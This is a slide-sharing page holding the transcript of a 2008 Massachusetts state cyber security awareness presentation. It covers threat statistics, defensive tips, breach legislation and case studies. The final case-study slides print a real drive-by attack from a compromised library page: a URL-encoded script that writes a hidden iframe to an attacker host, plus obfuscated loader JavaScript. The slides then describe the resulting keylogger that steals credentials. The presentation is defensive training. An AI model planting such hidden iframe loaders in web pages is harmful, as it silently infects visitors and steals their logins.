slide1 l.
Download
Skip this Video
Loading SlideShow in 5 Seconds..
Cyber Security Awareness [Everything You Were Afraid to Know About Computer Security, But Always Wanted to Ask] PowerPoint Presentation
Download Presentation
Cyber Security Awareness [Everything You Were Afraid to Know About Computer Security, But Always Wanted to Ask]

Loading in 2 Seconds...

play fullscreen
1 / 33

Cyber Security Awareness [Everything You Were Afraid to Know About Computer Security, But Always Wanted to Ask] - PowerPoint PPT Presentation


  • 625 Views
  • Uploaded on

Cyber Security Awareness [Everything You Were Afraid to Know About Computer Security, But Always Wanted to Ask]. Commonwealth of Mass. Information Technology Division November, 2008. Objectives for Today. Understand network security threats Learn simple defensive measures

loader
I am the owner, or an agent authorized to act on behalf of the owner, of the copyrighted work described.
capcha
Download Presentation

PowerPoint Slideshow about 'Cyber Security Awareness [Everything You Were Afraid to Know About Computer Security, But Always Wanted to Ask]' - Roberta


An Image/Link below is provided (as is) to download presentation

Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author.While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server.


- - - - - - - - - - - - - - - - - - - - - - - - - - E N D - - - - - - - - - - - - - - - - - - - - - - - - - -
Presentation Transcript
slide1

Cyber Security Awareness[Everything You Were Afraid to Know About Computer Security, But Always Wanted to Ask]

Commonwealth of Mass.

Information Technology Division

November, 2008

objectives for today
Objectives for Today
  • Understand network security threats
  • Learn simple defensive measures
  • Review some recent breaches
  • Introduce applicable new legislation
the sermon
The Sermon
  • Sobering Statistics
  • Why do we need to be here today?
  • The Threats
  • How Things Go Wrong
  • Protecting Yourself
  • Have I Been Compromised?
  • A Few High-Profile Case Studies
  • A Recent Eye-Opening Incident
  • Security Resources and References
  • Q & A
statistics
Statistics
  • One new infected web page is discovered every 5 seconds
  • One in 500 e-mail messages contains confidential information
  • One in 2500 e-mail messages contains an infected attachment
  • 41% of people use the same password at every site they visit
  • In 2007, 37000 reported breaches of government and private systems occurred
  • Revenues from cybercrime now exceed drug trafficking as the most lucrative illegal global business, estimated at more than $1 trillion annually in illegal profits
  • 75 percent of companies surveyed in 2004 reported a data-security breach within the past 12 months. (The Ponemon Institute)
  • 70% of security incidents are inside jobs. (Gartner Group)
  • “Many government offices don’t even know yet that they are leaking information. 90% of cases are probably still not known.” – McAfee Criminology Report
why are we here today
Why are we here today?
  • The World has Changed!
    • Flying?
    • Technology Advancements
      • Moore’s Law: 50+ years of supporting data
      • Processor Speed
      • Memory (Smaller, Faster, Larger Capacity)
      • Hard Drives (Smaller, with Larger Capacity)
      • Price (“Bang per Buck”)
    • What was Impossible 10 Years Ago is Routine Today.
    • Searching for a Cure to Web Malware
our mission
Our Mission
  • We still need to do our jobs
    • Educating Students of the Commonwealth
  • Securing Cyber-Resources
  • ID Theft & Data Breach Legislation
    • M.G.L. Ch 93H
    • Executive Order 504
    • 201 CMR 17.00
the challenge
The Challenge
  • Walking the tightrope between:
    • Taking full advantage of the constantly expanding wealth of IT resources available to us, and
    • Increased risk of exposure to attacks that accompanies increased reliance on technology.
  • Allowing business operations anytime and anywhere, via an increasing number of different devices and to an increasing number of mobile users and customers.
threats to students
Threats to Students
  • MySpace
  • FaceBook
  • YouTube
  • Peer-to-Peer Networks
  • Instant Messaging
  • Cyber Predators/Bullies
  • Inappropriate/Offensive Web Content
threats to networks
Threats to Networks
  • Two primary categories of threat:
    • Denial of Service
    • Loss/Leakage of Sensitive Data
denial of service dos
Denial of Service (DoS)
  • Definition:
    • Flooding a network with useless traffic, to the point of slowing or completely interrupting regular services
  • Often in combination with groups of other remotely-controlled computers
    • a/k/a Bot Nets
    • Result: Distributed Denial of Service (DDoS)
data loss leakage
Data Loss/Leakage
  • Definition:
    • Accidental leaking of sensitive information through sent data
    • Refers to the transmission of data which are either sensitive or useful in the further exploitation of the system through standard data channels
  • Result → compromise of data confidentiality
  • Since 2005, more than 200 million victims of data breach have been reported!
how things go wrong
How Things Go Wrong
  • Actively
    • User does something explicit to enable compromise
      • Open an infected email attachment
      • Follow a malicious web link
      • Accept IM-initiated downloads
      • Execute Web 2.0 rogue application
  • Passively
    • Attacker breaks into the user’s PC via scans
      • Unpatched operating system
      • Buggy application software
      • Vulnerable open ports
      • Compromised legitimate web sites
how things go wrong cont
How Things Go Wrong (cont.)
  • Carelessness
    • 98% of breaches are the result of “stupidity or inadvertent user action.” (IANS, 2007)
  • Actions by Malicious Insiders
    • 1.5% of breaches
  • Efforts by Organized Crime, Industrial Spies, and Foreign Government Agents
    • Least Frequent (~ 0.5%), but Most Costly, Most Sophisticated, and Most Difficult to Detect and Defend Against
who is most vulnerable
Who is Most Vulnerable?
  • Those who don’t patch regularly and don’t keep A/V up to date
  • Dial-up Users (but not very appealing to attackers)
  • Home Broadband Users
  • University Users
  • Mobile Users
protecting yourself
Protecting Yourself
  • Patch, Patch, Patch!
    • Use auto-update whenever possible
  • Anti-Virus Software (update daily)
  • Anti-SpyWare Software
  • Personal Firewall Software
  • Set and use good passwords on all accounts
    • How Strong is Your Password?
  • Encrypt Sensitive Data
  • Separate Student and Teacher/Admin Networks
protecting yourself cont
Protecting Yourself (cont.)
  • Wireless Networks… Beware!
  • Wireless Routers/Access Points:
    • Change default password and default SSID
    • SSID name should be “non-trivial”
    • Disable broadcasting of SSID if possible
    • Enable WPA/WPA-2 encryption, and change default key
    • Enable and use MAC filtering
  • Don’t save user IDs and passwords on your hard drive
  • Don’t Web surf from a privileged account!
  • Turn off auto-run for removable media
  • Practice “Safe Internet”
    • E-mail attachments
    • Downloads from Questionable Sites (esp. Freeware)
    • Peer-to-Peer Networks; Promiscuous Files Sharing
10 tips for fighting malware
10 Tips for Fighting Malware
  • Install (and use!) Anti-Virus Software
  • Install a Personal Firewall
  • Install an Anti-Spyware Tool
  • Patch!
  • Keep Browser Security Settings at Medium or High
  • Just Say “No!” to Orgs You Don’t Know/Trust
  • Avoid Browser Search-Help Bars
  • Verify Software Certificates Trusted by Your Browser
  • Get a Credit Card Only for Internet Shopping
  • Don’t Run Executable E-mail Attachments (Even From a Known Source)
have i been compromised
Have I Been Compromised?
  • How to tell if you’ve fallen victim
    • Abnormal slowdown in performance
    • Mysterious failures in commonly-used apps
      • Email
      • Web surfing
    • Unexpected popups
    • Mysterious/Unexpected outbound traffic
      • The only sure-fire way to detect a compromise
  • Cleaning a Bot:
    • Painful!
    • Requires 8-16 hours of cleanup time
    • Best if done by a professional
data breach id theft
Data Breach & ID Theft
  • M. G. L. c. 93H and 93I
    • New law went into effect October 31, 2007
    • Civil fine of up to $100 per affected person
  • Executive Order 504
    • Mandatory information security training
    • Effective September 19, 2008
    • Training for current staff within 12 months
  • 201 CMR 17.00
    • Mandates encryption of personal data
    • Effective January 1, 2009
cyber breach poster children
Cyber-Breach Poster Children
  • Milton Academy Network Breach (Nov ’07)
  • Needham PowerSchool Breach (August ’08)
  • GOP Stolen Laptop Unencrypted (September ’08)
  • CardSystems Solutions
  • TJX Companies, Inc.
  • CitiFinancial Services
  • Boston College
  • Monster.com
  • Massachusetts DPL
  • Nordea Bank (Sweden)
in the news
In the News
  • Commonwealth of PA, 1/4/08
    • Network attacked via compromised agency web pages
      • SQL injection used to update DB tables with links to malicious website
      • Users who visit compromised agency’s web site are silently redirected to a series of malicious web pages that try to exploit client-side (i.e., user’s) vulnerabilities in a number of applications
        • IE, RealPlayer, et al
      • Vulnerable systems become infected with malware
    • An example of “drive-by downloads”
evolving threats to users
Evolving Threats to Users
  • New and sophisticated forms of attack
    • “Customized” viruses, self-modifying threats, and threats that “attack back”
  • Attacks targeting new technologies
    • Peer-to-peer and VoIP services
  • Attacks targeting online social networks
    • MySpace, Facebook, YouTube, etc.
  • Attacks targeting online services
    • Especially online banking
new threat spamdexing
New Threat: Spamdexing
  • Web Searches!
    • 20% lead to unwanted content or malware sites
    • 80% of search blocks point to offensive content
  • “Drive-by Downloads”
    • Compromised, legitimate web site silently redirects user to malware sites
  • Mitigation: “corporate safe web search tool”
    • Notify web users of potential risks in real time
resources references
Resources & References
  • US-CERT (United States Computer Emergency Readiness Team)
    • http://www.us-cert.gov/
  • MS-ISAC (Multi-State Information Sharing and Access Center)
    • http://www.msisac.org
  • Identity Theft Research Center
    • http://www.idtheftcenter.org
close to home a lesson
Close to Home: a Lesson
  • Analysis completed on October 30, 2007
  • Involved breach of non-secret military network
    • But… could happen to anyone
  • Attack vector?
    • New York City public library!
nyc public library cont29
NYC Public Library (cont.)
  • Hidden in the bogus NYPL web page is:
  • What’s that???

<script type="text/javascript">

<!--

document.write(unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%66%6F%74%62%61%6C%6C%70%6F%72%74%61%6C%2E%69%6E%66%6F%2F%6F%75%74%2E%70%68%70%3F%73%5F%69%64%3D%31%22%20%73%74%79%6C%65%3D%22%76%69%73%69%62%69%6C%69%74%79%3A%20%68%69%64%64%65%6E%3B%20%64%69%73%70%6C%61%79%3A%20%6E%6F%6E%65%22%3E%3C%2F%69%66%72%61%6D%65%3E'));

//-->

</script>

nyc public library cont30
NYC Public Library (cont.)
  • What’s really there:

<iframe src="http[:]//fotballportal.info/out.php?s_id=1" style="visibility: hidden;display: none"></iframe>

  • This redirects user to “http[:]//meraxe.com/fsp1/index.php”
    • This all happens silently and invisibly!
  • What’s at meraxe.com…?
nyc public library cont31
NYC Public Library (cont.)
  • At meraxe.com, we find:
  • <script>function v4726d05808fd9(v4726d058097a8){ function v4726d05809f78 () {var v4726d0580a748=16; return v4726d0580a748;} return(parseInt(v4726d058097a8,v4726d05809f78()));}function v4726d0580af18(v4726d0580b6e8){ function v4726d0580ce59 () {var v4726d0580d630=2; return v4726d0580d630;} var v4726d0580beb8='';for(v4726d0580c68d=0; v4726d0580c68d<v4726d0580b6e8.length; v4726d0580c68d+=v4726d0580ce59()){ v4726d0580beb8+=(String.fromCharCode(v4726d05808fd9(v4726d0580b6e8.substr(v4726d0580c68d, v4726d0580ce59()))));}return v4726d0580beb8;} document.write(v4726d0580af18('Truncated));</script>
  • Effects:
    • The above code is (silently) downloaded and executed
nyc public library cont32
NYC Public Library (cont.)
  • What happened???
    • Downloadedandexecuteda file (age.exe)
      • Added file c:\WINDOWS\system32\control.dll
      • Added several Registry entries
        • Control.dll is loaded as a Browser Helper Object (BHO) when IE is started and becomes a keylogger
      • Deleted itself
  • Effects:
    • Control.dll monitors data entered into forms in IE
      • Steals user’s login credentials for legitimate web sites
        • On-line banking, credit cards, eBay, Paypal, etc, etc
    • “Phones home” with stolen data
slide33
Q & A
  • Summary:
    • Protecting yourself is only half the battle
    • Constant vigilance & awareness are a must
      • “Trust, but verify.” – Ronald Regan, quoting an old Russian (!) proverb
  • Questions…?